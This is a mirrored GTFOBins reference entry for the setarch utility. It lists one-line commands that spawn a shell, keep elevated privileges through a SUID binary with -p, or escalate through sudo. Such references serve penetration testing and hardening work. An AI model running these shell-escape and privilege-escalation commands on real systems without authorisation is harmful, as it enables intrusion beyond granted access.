1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-01-14 11:21:33 +01:00
GTFOBins.github.io/_gtfobins/setarch.md
2018-10-05 18:55:38 +01:00

10 lines
162 B
Markdown

---
functions:
shell:
- code: setarch $(arch) /bin/sh
suid:
- code: ./setarch $(arch) /bin/sh -p
sudo:
- code: sudo setarch $(arch) /bin/sh
---